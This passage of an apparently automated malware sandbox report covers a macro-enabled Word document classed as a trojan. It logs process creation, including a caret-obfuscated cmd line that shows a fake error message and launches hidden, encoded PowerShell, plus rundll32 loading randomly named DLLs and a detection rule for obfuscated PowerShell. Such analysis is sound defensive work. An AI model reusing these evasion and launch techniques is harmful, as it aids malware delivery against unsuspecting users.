                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B4B419_2_007B4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A87369_2_007A8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B63C19_2_007B63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B687F9_2_007B687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B5A619_2_007B5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AE05A9_2_007AE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AEA4C9_2_007AEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AF4449_2_007AF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A2A309_2_007A2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A9A379_2_007A9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A4A359_2_007A4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B340A9_2_007B340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B7A0F9_2_007B7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A1CFA9_2_007A1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B26F59_2_007B26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B12E29_2_007B12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A88E59_2_007A88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B8ADC9_2_007B8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A96CD9_2_007A96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B20C59_2_007B20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A80BA9_2_007A80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A60B99_2_007A60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A48BD9_2_007A48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007BA0AF9_2_007BA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A62A39_2_007A62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B889D9_2_007B889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A12809_2_007A1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A8F789_2_007A8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A5B799_2_007A5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B17739_2_007B1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AE3779_2_007AE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AC7699_2_007AC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B0B689_2_007B0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AB75F9_2_007AB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A67549_2_007A6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B23499_2_007B2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B8F499_2_007B8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B9B459_2_007B9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007ABB3A9_2_007ABB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A153C9_2_007A153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B0D339_2_007B0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AF5369_2_007AF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B511B9_2_007B511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B7F1F9_2_007B7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B5D1D9_2_007B5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B8D1C9_2_007B8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AB1129_2_007AB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B2B169_2_007B2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B0F0C9_2_007B0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B7D039_2_007B7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AD7EB9_2_007AD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B67E99_2_007B67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B71EF9_2_007B71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B31E29_2_007B31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B3FE79_2_007B3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B1BDF9_2_007B1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A9FDC9_2_007A9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B6DB99_2_007B6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B61B89_2_007B61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A17AC9_2_007A17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B73AC9_2_007B73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A69A09_2_007A69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A79989_2_007A7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A6D9F9_2_007A6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A839D9_2_007A839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B878F9_2_007B878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AF98C9_2_007AF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B95869_2_007B9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025B41F10_2_0025B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00252C6310_2_00252C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025EE7810_2_0025EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025568E10_2_0025568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026389510_2_00263895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025C0C610_2_0025C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002602C310_2_002602C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002642DA10_2_002642DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025873610_2_00258736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00257B6310_2_00257B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00264B4110_2_00264B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002663C110_2_002663C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00254A3510_2_00254A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00259A3710_2_00259A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00252A3010_2_00252A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00267A0F10_2_00267A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026340A10_2_0026340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00265A6110_2_00265A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026687F10_2_0026687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025F44410_2_0025F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025EA4C10_2_0025EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025E05A10_2_0025E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002562A310_2_002562A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026A0AF10_2_0026A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002548BD10_2_002548BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002560B910_2_002560B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002580BA10_2_002580BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025128010_2_00251280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026889D10_2_0026889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002588E510_2_002588E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002612E210_2_002612E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002626F510_2_002626F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00251CFA10_2_00251CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002620C510_2_002620C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002596CD10_2_002596CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00268ADC10_2_00268ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025F53610_2_0025F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00260D3310_2_00260D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025153C10_2_0025153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025BB3A10_2_0025BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00267D0310_2_00267D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00260F0C10_2_00260F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00262B1610_2_00262B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025B11210_2_0025B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00267F1F10_2_00267F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00268D1C10_2_00268D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00265D1D10_2_00265D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026511B10_2_0026511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025C76910_2_0025C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00260B6810_2_00260B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025E37710_2_0025E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026177310_2_00261773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00255B7910_2_00255B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00258F7810_2_00258F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00269B4510_2_00269B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026234910_2_00262349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00268F4910_2_00268F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025675410_2_00256754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025B75F10_2_0025B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002569A010_2_002569A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002517AC10_2_002517AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002673AC10_2_002673AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002661B810_2_002661B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00266DB910_2_00266DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026958610_2_00269586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0026878F10_2_0026878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025F98C10_2_0025F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025839D10_2_0025839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00256D9F10_2_00256D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025799810_2_00257998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00263FE710_2_00263FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002631E210_2_002631E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002671EF10_2_002671EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025D7EB10_2_0025D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002667E910_2_002667E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00261BDF10_2_00261BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00259FDC10_2_00259FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DB41F11_2_002DB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D2C6311_2_002D2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DEE7811_2_002DEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D568E11_2_002D568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E389511_2_002E3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DC0C611_2_002DC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E02C311_2_002E02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E42DA11_2_002E42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D873611_2_002D8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D7B6311_2_002D7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E4B4111_2_002E4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E63C111_2_002E63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D4A3511_2_002D4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D9A3711_2_002D9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D2A3011_2_002D2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E7A0F11_2_002E7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E340A11_2_002E340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E5A6111_2_002E5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E687F11_2_002E687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DEA4C11_2_002DEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DF44411_2_002DF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DE05A11_2_002DE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EA0AF11_2_002EA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D62A311_2_002D62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D48BD11_2_002D48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D60B911_2_002D60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D80BA11_2_002D80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D128011_2_002D1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E889D11_2_002E889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D88E511_2_002D88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E12E211_2_002E12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D1CFA11_2_002D1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E26F511_2_002E26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D96CD11_2_002D96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E20C511_2_002E20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E8ADC11_2_002E8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D153C11_2_002D153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DBB3A11_2_002DBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DF53611_2_002DF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E0D3311_2_002E0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E0F0C11_2_002E0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E7D0311_2_002E7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E7F1F11_2_002E7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E8D1C11_2_002E8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E5D1D11_2_002E5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E511B11_2_002E511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E2B1611_2_002E2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DB11211_2_002DB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DC76911_2_002DC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E0B6811_2_002E0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D5B7911_2_002D5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D8F7811_2_002D8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DE37711_2_002DE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E177311_2_002E1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E234911_2_002E2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E8F4911_2_002E8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E9B4511_2_002E9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DB75F11_2_002DB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D675411_2_002D6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D17AC11_2_002D17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E73AC11_2_002E73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D69A011_2_002D69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E61B811_2_002E61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E6DB911_2_002E6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E878F11_2_002E878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DF98C11_2_002DF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E958611_2_002E9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D839D11_2_002D839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D6D9F11_2_002D6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D799811_2_002D7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E71EF11_2_002E71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DD7EB11_2_002DD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E67E911_2_002E67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E3FE711_2_002E3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E31E211_2_002E31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E1BDF11_2_002E1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002D9FDC11_2_002D9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002CB41F12_2_002CB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002C2C6312_2_002C2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002CEE7812_2_002CEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002C568E12_2_002C568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002D389512_2_002D3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002CC0C612_2_002CC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002D02C312_2_002D02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002D42DA12_2_002D42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002C873612_2_002C8736
                      Source: Bestand.doc, OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation, OLE, VBA macro: Module Teh9tkv0p83u4g, Function Document_open, Name: Document_open
                      Source: Bestand.doc, OLE indicator, VBA macros: true
                      Source: 00000005.00000002.2092804988.00000000001B6000.00000004.00000001.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2092937441.0000000001B86000.00000004.00000001.sdmp, type: MEMORY, Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: rundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmp, Binary or memory string: .VBPud<_
                      Source: classification engine, Classification label: mal100.troj.expl.evad.winDOC@34/8@4/5
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 19_2_006F1C88 CreateToolhelp32Snapshot,19_2_006F1C88
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,7_2_10002D70
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\Desktop\~$estand.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRC7E0.tmp
                      Source: Bestand.doc, OLE indicator, Word Document stream: true
                      Source: Bestand.doc, OLE document summary: title field not present or empty
                      Source: Bestand.doc, OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exe, Console Write: Async message sent to session Console
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\msg.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe, File read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknown, Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                      Source: Bestand.doc, Virustotal: Detection: 61%
                      Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknown, Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [encoded command removed]
                      Source: unknown, Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [encoded command removed]
                      Source: unknown, Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kviedw\vklxa.red',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rqvte\amll.nuu',Control_RunDLL
                      Source: unknown, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq',Control_RunDLL
